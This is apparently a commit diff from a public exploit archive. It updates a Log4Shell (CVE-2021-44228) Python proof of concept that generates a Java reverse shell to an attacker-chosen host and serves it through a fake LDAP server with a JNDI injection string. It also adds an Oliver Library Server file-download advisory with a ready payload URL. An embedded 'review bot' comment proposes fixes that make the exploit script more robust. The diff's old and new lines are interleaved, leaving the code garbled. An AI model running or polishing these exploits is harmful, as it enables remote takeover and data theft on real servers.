DB: 2021-12-16

2 changes to exploits/shellcodes

Oliver Library Server v5 - Arbitrary File Download
Offensive Security 2021-12-16 05:01:55 +00:00
parent 90f7e494d6
commit 3d06837f80
3 changed files with 132 additions and 49 deletions


@ -9,20 +9,30 @@
# Github repo: https://github.com/kozmer/log4j-shell-poc # Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess import subprocess
import os
import sys import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) from http.server import HTTPServer, SimpleHTTPRequestHandler
print("\n")
userip = input("[+] Enter IP for LDAPRefServer & Shell: ") init(autoreset=True)
userport = input("[+] Enter listener port for LDAPRefServer: ")
lport = input("[+] Set listener port for shell: ")
def payload(): def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
javapayload = (""" def payload(userip , webport , lport):
genExploit = (
"""
import java.io.IOException; import java.io.IOException;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;
@ -30,52 +40,106 @@ import java.net.Socket;
public class Exploit { public class Exploit {
public Exploit() throws Exception { public Exploit() throws Exception {
String host="%s"; String host="%s";
int port=%s; int port=%s;
String cmd="/bin/sh"; String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port); Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) { while(!s.isClosed()) {
while(pi.available()>0) while(pi.available()>0)
so.write(pi.read()); so.write(pi.read());
while(pe.available()>0) while(pe.available()>0)
so.write(pe.read()); so.write(pe.read());
while(si.available()>0) while(si.available()>0)
po.write(si.read()); po.write(si.read());
so.flush(); so.flush();
po.flush(); po.flush();
Thread.sleep(50); Thread.sleep(50);
try { try {
p.exitValue(); p.exitValue();
break; break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
} }
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
""") % (userip,lport) # writing the exploit to Exploit.java file
f = open("Exploit.java", "w") try:
f.write(javapayload) f = open("Exploit.java", "w")
f.close() f.write(genExploit)
f.close()
print(Fore.GREEN + '[+] Exploit java class created success')
os.system('./jdk1.8.0_20/bin/javac Exploit.java') except Exception as e:
print(Fore.RED + f'[-] Something went wrong {e.toString()}')
sendme = ("${jndi:ldap://%s:1389/a}") % (userip) checkJavaAvailible()
print("[+] Send me: "+sendme+"\n") print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
def marshalsec(): # create the LDAP server on new thread
os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
t1.start()
# start the web server
httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
httpd.serve_forever()
def checkJavaAvailible():
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if(javaver != 0):
print(Fore.RED + '[-] Java is not installed inside the repository ')
sys.exit()
def createLdapServer(userip, lport):
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
url = "
http://{}:{}/#Exploit".format http://{}:{}/#Exploit".format
(userip, userport)) (userip, lport)
subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
"target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
if __name__== "__main__": def header():
payload() print(Fore.BLUE+"""
marshalsec() [!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
if __name__ == "__main__":
header()
try:
parser = argparse.ArgumentParser(description='please enter the values ')
parser.add_argument('--userip', metavar='userip', type=str,
nargs='+', help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport', metavar='webport', type=str,
nargs='+', help='listener port for HTTP port')
parser.add_argument('--lport', metavar='lport', type=str,
nargs='+', help='Netcat Port')
args = parser.parse_args()
#print(args.userip)
payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
except KeyboardInterrupt:
print(Fore.RED + "user interupted the program.")
sys.exit(0)
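Review bot: The `except Exception as e:` branch guarding the Exploit.java write calls `e.toString()`, which Python exceptions do not define, so any failure in that block raises a second AttributeError and hides the original error; the message should read `print(Fore.RED + f'[-] Something went wrong {e}')`. The open/write/close triple inside that same `try` would also be cleaner as `with open("Exploit.java", "w") as f: f.write(genExploit)`, so the handle is released even when the write fails. Separately, `createLdapServer(userip, lport)` names its second parameter `lport` while the thread is started with `webport`, which reads as if the shell port were in use there; renaming the parameter to `webport` would make the definition match its only call. The old and new sides of this section are printed interleaved, so the placement of these lines is inferred from the new-side text.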


@ -0,0 +1,18 @@
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log


@ -18583,6 +18583,7 @@ id,file,description,date,author,type,platform,port
50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux, 50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java, 50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java, 50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
